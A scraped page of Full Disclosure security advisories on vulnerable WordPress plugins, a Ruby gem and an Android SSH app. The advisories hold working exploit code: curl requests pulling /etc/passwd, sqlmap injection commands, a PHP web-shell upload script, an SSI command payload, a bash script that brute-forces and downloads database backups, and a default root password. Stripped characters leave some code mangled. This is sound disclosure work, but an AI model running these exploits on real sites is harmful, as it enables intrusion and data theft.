http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-02 Download Site: https://wordpress.org/plugins/wp-swimteam Vendor: Mike Walsh www.MichaelWalsh.org Vendor Notified: 2015-07-02, fixed in v1.45beta3 Vendor Contact: Through website Advisory: http://www.vapid.dhs.org/advisory.php?v=134 Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more. Vulnerability: The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files: 50 $file = urldecode($args['file']) ; 51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ; 52 53 while (!feof($fh)) 54 $txt .= fread($fh, 1024) ; 55 56 // Clean up the temporary file - permissions 57 // may prevent this from succeedeing so use the '@' 58 // to suppress any messages from PHP. 59 60 @unlink($file) ; 61 } 62 63 $filename = urldecode($args['filename']) ; 64 $contenttype = urldecode($args['contenttype']) ; 65 66 // Tell browser to expect a text file of some sort (usually txt or csv) 67 68 header(sprintf('Content-Type: application/%s', $contenttype)) ; 69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ; 70 print $txt ; CVEID: OSVDB: Exploit Code: • $ curl http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwdfilename=/etc/passwdcontenttype=text/htmltransient=1abspath=/usr/share/wordpress; ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in easy2map-photos wordpress plugin v1.09
Title: SQL Injection in easy2map-photos wordpress plugin v1.09 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map-photos Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.1.0 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=130 Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries. Vulnerability: The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input. 48 $wpdb-query(sprintf(UPDATE $mapsTable 49 SET PolyLines = '%s' 50 WHERE ID = '%s';, $PolyLines, $mapID)); 218 $wpdb-query(sprintf( 219 UPDATE $mapsTable 220 SET TemplateID = '%s', 221 MapName = '%s', 222 Settings = '%s', 223 CSSValues = '%s', 224 CSSValuesPhoto = '%s', 225 CSSValuesMap = '%s', 226 MapHTML = '%s', 227 IsActive = 1 228 WHERE ID = %s;, 229 $_REQUEST['mapTemplateName'], 230 $_REQUEST['mapName'], 231 urldecode($_REQUEST['mapSettingsXML']), 232 urldecode($_REQUEST[parentCSSXML]), 233 urldecode($_REQUEST[photoCSSXML]), 234 urldecode($_REQUEST[mapCSSXML]), 235 urldecode($_REQUEST[mapHTML]), $mapID)); 238 //this is a map insert 239 if (!$wpdb-query(sprintf( 240 INSERT INTO $mapsTable( 241 TemplateID, 242 MapName, 243 DefaultPinImage, 244 Settings, 245 LastInvoked, 246 PolyLines, 247 CSSValues, 248 CSSValuesPhoto, 249 CSSValuesMap, 250 MapHTML, 251 IsActive 252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', 0);, 253 $_REQUEST['mapTemplateName'], 254 $_REQUEST['mapName’] 331 $wpdb-query(sprintf( 332 UPDATE $mapsTable 333 SET MapName = '%s' 334 IsActive = 1 335 WHERE ID = %s;, 336 $_REQUEST['mapName'], 337 $mapID)); Also In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters: if (!file_exists($imagesDirectory)) { mkdir($imagesDirectory); } CVEID: 2015-4615 2015-4617 OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data=mapID=11mapName='+or+1%3D%3D1%3Baction=e2m_img_save_map_name --cookie=COOKIE HERE --level=5 --risk=3 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-05 Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling Vendor: https://profiles.wordpress.org/haet/ Vendor Notified: 2015-07-05, fixed in version 2.6. Vendor Contact: http://wpshopstyling.com Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders. Vulnerability: The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded. 1 ?php 2 require_once(../../../../wp-admin/admin.php); 3 4 header('Content-disposition: attachment; filename='.$_GET['filename']); 5 header('Content-type: application/pdf'); 6 readfile(HAET_INVOICE_PATH.$_GET['filename']); 7 ? You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path. CVEID: Requested TBD OSVDB: TBD Exploit Code: • $ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/mdc-youtube-downloader Vendor: https://profiles.wordpress.org/mukto90/ Vendor Notified: 2015-07-01, removed vulnerable code. Vendor Contact: n.mu...@gmail.com Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site. Vulnerability: The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be downloaded: $file_name = $_GET['file']; // make sure it's a file before doing anything! if(is_file($file_name)) { . . . switch(strtolower(substr(strrchr($file_name, '.'), 1))) { case 'pdf': $mime = 'application/pdf'; break; case 'zip': $mime = 'application/zip'; break; case 'jpeg': case 'jpg': $mime = 'image/jpg'; break; default: $mime = 'application/force-download'; } header('Pragma: public'); // required header('Expires: 0'); // no cache header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); header('Cache-Control: private',false); header('Content-Type: '.$mime); header('Content-Disposition: attachment; filename='.basename($file_name).''); header('Content-Transfer-Encoding: binary'); header('Content-Length: '.filesize($file_name));// provide file size header('Connection: close'); readfile($file_name); // push it out exit(); CVEID: Requested, TBD. OSVDB: TBD. Exploit Code: • $ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in easy2map wordpress plugin v1.24
Title: SQL Injection in easy2map wordpress plugin v1.24 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.25 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=131 Description: The easiest tool available for creating custom great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity. Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 90 $wpdb-query(sprintf(UPDATE $mapsTable 91 SET PolyLines = '%s' 92 WHERE ID = '%s';, $PolyLines, $mapID)); . . . 163 $wpdb-query(sprintf( 164 UPDATE $mapsTable 165 SET TemplateID = '%s', 166 MapName = '%s', 167 Settings = '%s', 168 LastInvoked = CURRENT_TIMESTAMP, 169 CSSValues = '%s', 170 CSSValuesList = '%s', 171 CSSValuesHeading = '%s', 172 MapHTML = '%s', 173 IsActive = 1, 174 ThemeID = '%s' 175 WHERE ID = %s;, 176 $Items['mapTemplateName'], 177 $Items['mapName'], 178 urldecode($Items['mapSettingsXML']), 179 urldecode($Items[mapCSSXML]), 180 urldecode($Items[listCSSXML]), 181 urldecode($Items[headingCSSXML]), 182 urldecode($Items[mapHTML]), 183 $Items['mapThemeName'], 184 $mapID)); 185 } else { 186 187 //this is a map insert 188 if (!$wpdb-query(sprintf( 189 INSERT INTO $mapsTable( 190 TemplateID, 191 MapName, 192 DefaultPinImage, 193 Settings, 194 LastInvoked, 195 PolyLines, 196 CSSValues, 197 CSSValuesList, 198 CSSValuesHeading, 199 MapHTML, 200 IsActive, 201 ThemeID 202 ) VALUES ('%s', '%s', '%s', '%s', 203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');, 204 $Items['mapTemplateName'], 205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . images/map_pins/pins/111.png, 206 urldecode($Items['mapSettingsXML']), '', 207 urldecode($Items[mapCSSXML]), 208 urldecode($Items[listCSSXML]), 209 urldecode($Items[headingCSSXML]), 210 urldecode($Items[mapHTML]), 211 $Items['mapThemeName']))) . . 267 $wpdb-query(sprintf( 268 UPDATE $mapsTable 269 SET MapName = '%s', 270 LastInvoked = CURRENT_TIMESTAMP, 271 IsActive = 1 272 WHERE ID = %s;, $mapName, $mapID)); In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory: 4 $imagesDirectory = WP_CONTENT_DIR . /uploads/easy2map/images/map_pins/uploaded/ . $_GET[map_id] . /; . . 11 if (is_uploaded_file($_FILES[pinicon]['tmp_name'])) { 12 13 if (!file_exists($imagesDirectory)) { 14 mkdir($imagesDirectory); 15 } CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug) OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data=mapID=11mapName='+or+1%3D%3D1%3Baction=e2m_img_save_map_name --cookie=‘COOKIE HERE’ --level=5 --risk=3 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in download-zip-attachments v1.0
Title: Remote file download vulnerability in download-zip-attachments v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-10 Download Site: https://wordpress.org/plugins/download-zip-attachments/ Vendor: rivenvirus Vendor Notified: 2015-06-15 Vendor Contact: https://profiles.wordpress.org/rivenvirus/ Advisory: http://www.vapid.dhs.org/advisory.php?v=129 Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. ?php if(isset($_REQUEST['File']) !empty($_REQUEST['File'])){ define('WP_USE_THEMES', false); require('../../../wp-load.php'); require create_zip_file.php; $uploads = wp_upload_dir(); $tmp_location = $uploads['path']./.$_REQUEST['File']; //echo $tmp_location; $zip = new CreateZipFile; $zip-forceDownload($tmp_location,false); unlink($tmp_location); exit; } CVEID: 2015-4704 OSVDB: Exploit Code: • http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-12 Download Site: https://wordpress.org/plugins/wp-instance-rename/ Vendor: Vlajo Vendor Notified: 2015-06-12 Advisory: http://www.vapid.dhs.org/advisory.php?v=127 Vendor Contact: Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page. Vulnerability: The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory: try{ $dbname = $_GET[dbname]; $dumpfname = $_GET[dumpfname]; $backup_folder = $_GET[backup_folder]; }catch (Exception $e){} if(empty($backup_folder)){ $backup_folder=backup/; } echo $dumpfname; if (file_exists($dumpfname)) { // zip the dump file $name=$dbname . _ . date(Y-m-d); $zipfname = $backup_folder.$name..zip; $zip = new ZipArchive(); if($zip-open($zipfname,ZIPARCHIVE::CREATE)) { $zip-addFile($dumpfname,$dumpfname); $zip-close(); } // read zip file and send it to standard output if (file_exists($zipfname)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($zipfname)); flush(); readfile($zipfname); CVEID: 2015-4703 OSVDB: Exploit Code: • curl --data dbname=wpdumpfname=/etc/passwdbackup_folder=. http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-07 Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms Vendor: Waters Edge Web Design and NetherWorks LLC Vendor Notified: 2015-06-08 Advisory: http://www.vapid.dhs.org/advisory.php?v=125 Vendor Contact: plug...@wordpress.org Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: 1 ?php 2 3 $filename = $_SERVER[DOCUMENT_ROOT]./wp-load.php; 4 if (file_exists($filename)) { 5 include_once($filename); 6 } else { 7 include_once(../../../../wp-load.php); 8 } 9 echo Here; 10 $image_file = $_FILES['gf_aviary_file']; 11 if($image_file['name']!=''){ 12 $max_file_size = 4*1024*1024; 13 $file_size = intval($image_file['size']); 14 if( $file_size $max_file_size ){ 15 $msg = File Size is too big.; 16 $error_flag = true; 17 } 18 $extension = strtolower(end(explode('.', $image_file['name']))); 19 $aa_options = get_option('gf_aa_options'); 20 $supported_files = $aa_options['supported_file_format']; 21 $supported_files = strtolower($supported_files); 22 if(!$error_flag $supported_files != '' ){ 23$supported_files = explode (',', $supported_files); 24if(!in_array($extension, $supported_files)){ 25 $msg = No Supported file.; 26 $error_flag = true; 27} 28 } 29 if(!$error_flag){ 30 $wp_upload_dir = wp_upload_dir(); 31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ 32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); 33 } 34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; 35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; 36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name']; 37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ 38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name']; 39 } 40 } 41 $return_obj = array('status' = 'success', 'message' = $file_url); 42 echo json_encode($return_obj); 43 } 44 ? CVEID: 2015-4455 OSVDB: Exploit Code: • ?php • /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */ • /*Larry W. Cashdollar @_larry0 • 6/7/2015 • shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php • */ • • •$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/ • upload.php'; •$file_name_with_full_path = '/var/www/shell.php'; • •echo POST to $target_url $file_name_with_full_path; •$post = array('name' = 'shell.php','gf_aviary_file'='@'.$file_name_with_full_path); • •$ch = curl_init(); •curl_setopt($ch, CURLOPT_URL,$target_url); •curl_setopt($ch, CURLOPT_POST,1); •curl_setopt($ch, CURLOPT_POSTFIELDS, $post); •curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); •$result=curl_exec ($ch); •curl_close ($ch); •echo hr; •echo $result; •echo hr; • ? ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17 Author: Larry W. Cashdollar, @_larry0 Date: 2015-03-29 Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/ Vendor: http://www.videowhisper.com/ Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822 Vendor Contact: http://www.videowhisper.com/tickets_submit.php Advisory: http://www.vapid.dhs.org/advisory.php?v=117 Description: from the site VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page. Vulnerability: From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows various remote unauthenticated file uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which types are allowed. Because of this .shtml can be passed through and remote code execution if SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps The if (strstr($filename,'.php')) exit; can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml ?php if ($_GET[room]) $room=$_GET[room]; if ($_POST[room]) $room=$_POST[room]; $filename=$_FILES['vw_file']['name']; include_once(incsan.php); sanV($room); if (!$room) exit; sanV($filename); if (!$filename) exit; if (strstr($filename,'.php')) exit; //do not allow uploads to other folders if ( strstr($room,/) || strstr($room,..) ) exit; if ( strstr($filename,/) || strstr($filename,..) ) exit; $destination=uploads/.$room./“; if ($_GET[slides]) $destination .= slides/“; $ext=strtolower(substr($filename,-4)); $allowed=array(.swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps”); if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); ?loadstatus=1 CVEID: TBD OSVDB: TBD Exploit Code: videowhis_poc.php ?php $uploadfile=upexp.shtml; $ch = curl_init(http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php;); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('vw_file'=@$uploadfile,'name'='upexp.shtml','room'='.')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print $postResult; ? upexp.shtml html !--#exec cmd=/usr/bin/date /tmp/p -- this is html /html The executeable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin
#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite DATE=20141031; #Date to search if [ ! -e rainbow ]; then cat -EOF- rbow.c /*Create rainbow table for guessing wp-backup-db v2.2.4 backup path Larry W. Cashdollar*/ #include stdio.h int main (void) { char string[16] = 0123456789abcdef; int x, y, z, a, b; for (x = 0; x 16; x++) for (y = 0; y 16; y++) for (z = 0; z 16; z++) for (a = 0; a 16; a++) for (b = 0; b 16; b++) printf (%c%c%c%c%c\n, string[x], string[y], string[z], string[a], string[b]); return(0); } -EOF- echo [+] Compiling rbow.c gcc rbow.c -o rbow echo [+] Creating rainbow table... ./rbow rainbow fi if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk '{print $1}'`; echo [+] Searching; for x in `cat rainbow`; do CPATH=http://$1/wp-content/backup-$x/;; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n $RESULT ]; then echo [+] Location $CPATH Found; echo [+] Received $RESULT; echo $x found.txt; break; #break here fi; echo -n Percent Done: ; Y=`echo scale=6;($Z/$K)*100|bc`; echo -n $Y echo %; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. K=999; for y in `seq -w 0 999`; do CPATH=http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql;; #change WP Database Name and Table Prefix here RESULT=`curl -s --head $CPATH|grep 200`; if [ -n $RESULT ]; then echo [+] Database backup $CPATH Found; echo [+] Received $RESULT; wget $CPATH exit; #break here fi; echo -n Percent Done: ; Y=`echo scale=2;($Z/$K)*100|bc`; echo -n $Y echo %; Z=$(( $Z + 1 )); done ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Rooted SSH/SFTP Daemon Default Login Credentials
I stumbled on to this while setting up an android vulnerability testing lab. Title: Rooted SSH/SFTP Daemon Default Login Credentials Author: Larry W. Cashdollar, @_larry0 OSVDB-ID: 110742 Date: 9/2/2014 Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon Description: This app is a SSH terminal server AND an SFTP file server. Vulnerability: The software comes pre-configured with a default login of User: root Password: abc123. This weak password would easily be guessed leading to root compromise of the android system. Recommended Fix: Request the user set the password upon installation. Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014 Greets to 44CON. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14
Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14 Date: 4/15/2014 Author: Larry W. Cashdollar, @_larry0 CVE: 2014-2888 Download: http://rubygems.org/gems/sfpagent Vulnerability The list variable generated from the user supplied JSON[body] input is passed directly to the system() shell on line 649. If a user supplies a module name with shell metacharacters like ; they might be able to execute shell commands on the remote system as the sfpagent running user id. 637 code, body = get_data(address, port, '/modules') 638 raise Exception, Unable to get modules list from {name} if code.to_i != 200 639 640 modules = JSON[body] 641 list = '' 642 schemata.each { |m| 643 list += {m} if File.exist?({modules_dir}/{m}) and 644(not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s) 645 } 646 647 return true if list == '' 648 649 if system(cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1/dev/null 2/tmp/install_module.error) 650 Sfp::Agent.logger.info Push modules #{list}to #{name} [OK] 651 else 652 Sfp::Agent.logger.warn Push modules #{list}to #{name} [Failed] 653 end 654 655 return true Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue. Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/